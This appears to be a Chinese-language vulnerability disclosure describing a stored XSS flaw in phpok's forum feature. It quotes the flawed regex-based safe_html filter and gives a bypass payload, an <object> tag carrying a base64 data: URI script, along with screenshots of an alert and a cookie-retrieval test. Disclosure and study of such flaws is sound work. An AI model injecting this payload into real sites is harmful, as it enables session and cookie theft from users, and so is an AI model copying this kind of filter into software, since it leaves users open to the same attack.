### 简要描述:
phpok(论坛BBS功能) 存储型xss
### 详细说明:
public function safe_html($content,$clear_url='')
{
$content = preg_replace_callback('/<(.+)>/isU',array($this,'_clean_xss_on'),$content);
//清除带src和href里的信息
$content = preg_replace_callback("/<(.*)(src|href)\s*=(\"|')(.+)(\\3)(.*)>/isU",array($this,'_clean_xss_script'),$content);
//清除src传递没有引号的数据
$content = preg_replace_callback("/<(.*)(src|href)\s*=([^\s>]+)([\s|\/|>])/isU",array($this,'_clean_xss_script2'),$content);
//清除script,applet,style,title,iframe等不安全信息
$content = preg_replace("/<(^[script|applet|style|title|iframe|frame|frameset|link]+).*>[.\n\t\r]*<\/\\1>/isU",'',$content);
$content = preg_replace("/<\/?link.*?>/isU","",$content);
//清除meta信息
$content = preg_replace('/<meta(.+)>/isU','',$content);
.........
return $content;
}
绕过测试:
```
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
```
[<img src="https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png" alt="QQ截图20150414182421.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png)
COOkie获取测试:
[<img src="https://images.seebug.org/upload/201504/14182738f24a403a6a82c5006b9fcc1416e72915.png" alt="QQ截图20150414182719.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/14182738f24a403a6a82c5006b9fcc1416e72915.png)
### 漏洞证明:
[<img src="https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png" alt="QQ截图20150414182421.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201504/1418243541f5bfbdae5a92b0c7d55b8bf4995359.png)
京公网安备 11010502034610号
暂无评论